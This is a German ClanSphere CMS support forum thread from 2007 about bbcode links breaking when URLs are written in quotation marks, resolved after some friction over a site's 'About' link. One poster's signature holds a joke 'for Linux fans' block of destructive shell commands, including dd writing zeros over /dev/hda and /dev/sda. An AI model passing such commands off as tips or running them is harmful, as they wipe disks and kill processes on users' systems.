Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 10
Seite [1]
bulli


Beginner



Herkunft: Piacenza
Beiträge: 5
# Thema - 06.06.2007 um 21:35 Uhr
servus,

wieder mal ein kleines problemchen. werden in clansphere (aktuelle version) irgendwo links im format url eingegeben, bastelt clansphere daraus immer einen link folgendem format: "http://grundadresse des servers, wo clansphere liegt/"www.url.de""

also eigenartig. wer mal kucken will

http://www.dunkelschimmer.de/clansphere

gleich auf der startseite ist ne news mit test und nem testlink, da kann man das problem gut sehen.

danke für die hilfe schonmal im voraus

lg
markus
Inaktiv
quemao


King for a day




Herkunft: Ort Der Gem. Baustelle
Beiträge: 353
# Antwort: 1 - 06.06.2007 um 21:47 Uhr
jop das ist di function_auto_url in der system/core/abcode.php

hab sie erstmal raus genommen um das problem zu beheben, vll kommt bald fix raus den sonst gibts das problem auch bei mails


------------------



I will Thx God for giv me 10 Fingers, 2 Wonderfull Kids,

a nice Girlfriend and a lot of Bullshit !









Projekte +-


CHECK & JOIN QUEMAO DESIGNZ COMMUNITY
[-Go 2 quema0-Designz.de-]


Check my mySpace Profil
[-http://profile.myspace.com/quema0-]

Last Reference
[-Sinuhe Official Website-]




Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 2 - 07.06.2007 um 00:02 Uhr
@bulli:
Entweder bin ich blind oder ich kann den Link zum About wirklich nicht finden!


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 3 - 07.06.2007 um 00:05 Uhr
unten rechts unter der shoutbox, aber zu klein und falsch platziert vor allem.

bitte ändern.


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
bulli
Thread-Ersteller


Beginner



Herkunft: Piacenza
Beiträge: 5
# Antwort: 4 - 07.06.2007 um 00:25 Uhr
??????

das about hat exakt die selbe grösse wie in jedem der standard templates. dazu ist da nicht nur das about sondern extra drüber noch euer banner als einziges werbe-banner auf der page weil ich extra für euch werbung machen will.

also das find ich jetzt schon ein bischen lächerlich.

zum problem gibts keine hilfe?


Zuletzt editiert von bulli am 07.06.2007 um 00:27 Uhr (1x Editiert)
Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 5 - 07.06.2007 um 00:28 Uhr
nein gibts nicht solange das about nich richtig plaziert ist


Inaktiv
|
bulli
Thread-Ersteller


Beginner



Herkunft: Piacenza
Beiträge: 5
# Antwort: 6 - 07.06.2007 um 00:56 Uhr
whatever


Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 7 - 07.06.2007 um 01:00 Uhr
bulli: mach den link einfach in die navi und alle sind zufrieden.
topic: fehler war eigentlich mit sp1 behoben, läuft seit dem bei mir wie geschmiert.


Inaktiv
|
bulli
Thread-Ersteller


Beginner



Herkunft: Piacenza
Beiträge: 5
# Antwort: 8 - 07.06.2007 um 01:13 Uhr
das ist doch mal ne antwort. den link wirds in der fertigen template version in der navi geben. das banner wird da aber keinen platz haben.

zum problem: hatte erst rc3 und dann alle dateien mit .0_sp1 überschrieben + db update gemacht. er packt einfach vor den link ein $_SERVER['PHP_SELF']

hab die abcode.php, die du bei den news vom 30.05. als fix gepostet hast extra nochmal runtergeladen und die alte damit überschrieben. selbes problem. er bastelt eine url zusammen wie in der funktion cs_url in der system/core/tools.php ... strange


Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 9 - 07.06.2007 um 01:16 Uhr
ah okay sorry hatte das problem erst falsch verstanden.
wir verwenden eigentlich keine anführungszeichen, müsstest dann direkt [ url=www.deineseite.de]bla[/url] schreiben.
kann aber auch dafür grad was einbauen, das ist nicht das problem.

gruß

duRiel


Inaktiv
|
bulli
Thread-Ersteller


Beginner



Herkunft: Piacenza
Beiträge: 5
# Antwort: 10 - 07.06.2007 um 10:54 Uhr
jup, liegt einfach nur an den anführungszeichen. mit denen verbuxelt er das ganze.

jo, über den einbau für nen filter für die anführungszeichen wäre die ganze sache sicherlich bedienungsfreundlicher. weiss nicht wie es anderen geht, aber intuitiv haben bei mir im clan schon mehrere die anführungszeichen dazugepackt.

thanx für die hilfe!


Inaktiv
|
Antworten: 10
Seite [1]


Sie müssen sich registrieren, um zu antworten.